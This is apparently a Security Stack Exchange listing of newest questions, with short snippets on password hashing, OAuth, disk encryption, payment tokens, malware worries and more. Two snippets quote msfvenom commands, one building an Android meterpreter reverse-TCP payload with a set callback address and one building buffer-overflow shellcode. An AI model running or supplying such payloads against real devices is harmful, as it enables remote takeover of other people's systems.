Newest Questions

0 votes, 0 answers, 4 views
Is it possible to insert hidden code using UTF-8 that rearranges a sequence of executable ASCII letters (first UTF-8 character that rearranges the letters off-screen could be interpreted as an ignorable ...
Asked by loud_flash

0 votes, 0 answers, 21 views
To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
Asked by DevelJoe

1 vote, 0 answers, 24 views
I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
Asked by Eray Halidov

0 votes, 1 answer, 43 views
I use msfvenom generated shellcode in a buffer overflow. Here's the command that I used to create shellcode for linux x64: msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami and here's ...
Asked by CyberCr0w

0 votes, 1 answer, 36 views
I have recently added CSP headers to a rather complex web application, being report-only at first. I got some noise from browser extensions in the report, but two incidents caught my eye especially: ...
Asked by cis

1 vote, 0 answers, 30 views
I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also? I saw that it can attack during a phone update download. If the update has downloaded ...
Asked by Master Baiter

1 vote, 0 answers, 65 views
I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
Asked by Dolda2000

1 vote, 0 answers, 76 views
Until now, I have been using a VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
Asked by zbroqvfuktscvn

0 votes, 0 answers, 56 views
Wikipedia's CAs are Let's Encrypt, DigiCert and GlobalSign. But my browser shows a certificate issued by... Google? (See the screenshot) What can this possibly mean? I know there are some similar ...

0 votes, 0 answers, 13 views
I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global. Usually, a system-related program would go in /...
Asked by DannyNiu

0 votes, 0 answers, 24 views
I want to know how secure the package lm-sensors is. I need to monitor the temperature of my machine to adapt the configuration of the fans. The program prompts me for my root password to access ...
Asked by Yohan W. Dunon

0 votes, 0 answers, 22 views
I want your advice for a cybersecurity career. I've had 3 years of experience as a full-stack developer and I think I gave some love to all things related to DevOps and Linux and cybersecurity, so I ...
Asked by php_learn

0 votes, 0 answers, 21 views
I tried to search the web for existing projects, but after failed attempts, I decided to code something in my own way, one approach, open to comments and improvements: #!/usr/bin/env python3 import ...
Asked by Gilles Quénot

0 votes, 0 answers, 32 views
This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
Asked by Towrope

0 votes, 1 answer, 87 views
I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
Asked by In Hoc Signo

0 votes, 0 answers, 18 views
I discovered ExtAnalysis and tried to run it in a Docker container, but it seems that this project is abandoned. There are too many errors. Some issues have been open since 2023 in the repository. So my ...
Asked by Gilles Quénot

-1 votes, 0 answers, 47 views
During the change of clock due to daylight saving time, almost all banks stop all money transactions at least from 1 hour before to 1 hour after the time of the change of the clock. Why do they ...
Asked by Space.yg

0 votes, 0 answers, 18 views
I am doing a security exercise where I need to use a wordfile and scan a server for endpoints to find a secret. The secret is in a file called .env (I found it in a different way), but I wonder why ...
Asked by Μenelaοs

0 votes, 1 answer, 188 views
I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
Asked by Sam Coutteau

5 votes, 1 answer, 809 views
I noticed that with Linux pam-u2f module whether you are required to input your PIN can be changed by simply editing ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
Asked by ojs

6 votes, 1 answer, 609 views
Apple claims that a one-time token is created. What is the purpose of that token? What happens with that token? As far as I know, when I pay with my physical debit card the information passed to the POS ...
Asked by ilhan

0 votes, 1 answer, 40 views
My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future. One potential client has us using their ...
Asked by Magellan Jim

7 votes, 3 answers, 2k views
I use SMS for MFA (yes I know it's bad, but better than no MFA) in a web application. On login an OTP is sent to the user via SMS. This OTP is valid until: it expires after 10 minutes, it is ...
Asked by Martin

0 votes, 0 answers, 21 views
How does Defender for Cloud interpret and normalize these logs? In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP. ...
Asked by Sabari A

0 votes, 1 answer, 62 views
When you interact with QSCD on a token do you need the middleware to be issued by a Trusted Service Provider (TSP), or is middleware just a utility which I can reimplement on another platform? Does ...
Asked by Desperado

1 vote, 0 answers, 46 views
I have an application, myapplication.exe. Through IFEO registry I can attach a debugger, which can be a malicious piece of software for an attacker. Only someone having access to Windows registry can ...
Asked by Jyothish Bhaskaran

0 votes, 0 answers, 55 views
A user accidentally clicked a link in a phishing email. The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
Asked by maruf

0 votes, 1 answer, 96 views
In PHP I am generating a unique random token used as a code and index for password resets: declare(strict_types=1); namespace App\Domain\Helper; use Ramsey\Uuid\Uuid; use Random\RandomException; ...
Asked by Dimitrios Desyllas

0 votes, 0 answers, 4 views
Is there any method to forensically analyse Android mobile memory without rooting the phone? I want to capture malware on my Android phone.
Asked by Reza Haider

0 votes, 3 answers, 98 views
I am using the following approach for a time-limited OTP used in my PHP app using a pseudorandom generator: $otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT); Then upon the User I store:...
Asked by Dimitrios Desyllas

0 votes, 0 answers, 39 views
Does the chocolatey package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them? I usually trust my OS ...
Asked by Michael Altfield

0 votes, 1 answer, 30 views
Does the cygwin package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them? Fortunately, it's possible to ...
Asked by Michael Altfield

3 votes, 7 answers, 3k views
I am making my first commercial Java program and am worried about crack prevention. I would run it on the cloud, except it needs to run on their machine at a runtime. I have an obfuscator set up, but ...
Asked by user31830467

0 votes, 0 answers, 49 views
Assuming that RAM is inside the SoC, nullifying the possibility of cold-boot attacks, the only other way to obtain the decryption key is to extract it from the secure storage in which it is saved. I ...
Asked by allexj

0 votes, 0 answers, 36 views
I have been asked to implement a new payment system that uses Google/Apple Pay's Direct integration (using Tokenized PANs (DPAN), not clear cards) as well as a similar Tokenized PAN retrieved from our ...
Asked by APagonis

0 votes, 2 answers, 171 views
Embedded and IoT systems power on autonomously, without user input (unlike PCs or phones requiring a PIN/password). If the manufacturer wants to encrypt the flash storage: Must the decryption key be ...
Asked by allexj

2 votes, 1 answer, 168 views
I have two related questions about BitLocker's key handling: 1) After the system boots and BitLocker unlocks the drive, TPM releases the Volume Master Key (VMK) and from now on it is resident in ...
Asked by allexj

0 votes, 1 answer, 63 views
I'm trying to understand the Authorisation Code flow in OAuth and I'm confused about how CSRF would happen; specifically, I don't think I understand how the flow actually works. Here's a diagram of ...
Asked by AS3

0 votes, 1 answer, 57 views
I'm implementing OAuth2 authorization code flow with PKCE for a public client (SPA) using Spring Authorization Server, and I've noticed that no refresh token is included by default in the token ...
Asked by ikiwq

1 vote, 1 answer, 65 views
In this old InfoSec SE question regarding IDNs (International Domain Names), the OP asks if companies should "actively seek out and register domains in alternative (similar looking) character ...
Asked by Amazon Dies In Darkness

0 votes, 1 answer, 46 views
I have an API Key for a service that holds sensitive data (Sick Days, Employee Home Address) that should not be exposed to other devs in my company. The API of my service will only allow a user with a ...
Asked by Andresch Serj

0 votes, 0 answers, 74 views
I'm struggling to come up with a better encryption model for this scenario: User is a mobile app user. Small (USA) company with a small budget wants to store data encrypted at rest per user in cloud ...
Asked by dotmainframe

0 votes, 0 answers, 157 views
I came to ask this question here because it ended up being more of an operating system security heuristics/cryptological question than a pure reverse-engineering one. The question is about UAC and its ...
Asked by nostromo

0 votes, 1 answer, 194 views
I have about ten copies of: avg_secure_browser_setup1.exe avg_secure_browser_setup2.exe avg_secure_browser_setup3.exe etc. This isn't the first time that I've found this. The first time I noticed ...
Asked by Zebrafish

0 votes, 0 answers, 6 views
After a fresh install of Windows 11 on a wiped disk, can you hide your Recycle Bin and never use "Delete", but instead right-click the file or folder and use Eraser software to permanently ...
Asked by Mark Donnell

1 vote, 1 answer, 86 views
If I wipe a SSD twice with Killdisk, then do a clean install of Windows 11, then do full disk encryption with Veracrypt, then clone this disk to several wiped external SSDs, can I use the same ...
Asked by Mark Donnell

1 vote, 1 answer, 69 views
PuTTY's latest master key (https://www.chiark.greenend.org.uk/~sgtatham/putty/keys.html) does not seem validated / signed by external 3rd parties. Is this a red flag? See https://pgp.mit.edu/pks/...
Asked by Kamal

0 votes, 0 answers, 74 views
I sometimes see on Opera on Android: Allow protected content https://www.politico.com/ wants to play protected content. Your device's identity may be accessed by this site. ☑ Remember choice Deny ...
Asked by Franck Dernoncourt

1 vote, 0 answers, 47 views
My apologies if I ask a basic question. My question: when we design AD environments, we create tiering models, for example, let's say Tier-0 (Domain admins), Tier-1 (Workstation users). So now, ...
Asked by deucalion

0 votes, 1 answer, 53 views
This is the scenario I'm facing: Windows 10 LTS / Windows 11 clients; user with autologon and "unknown" password (the password is autorotated and stored somewhere); user has limited rights (...
Asked by Arsenal
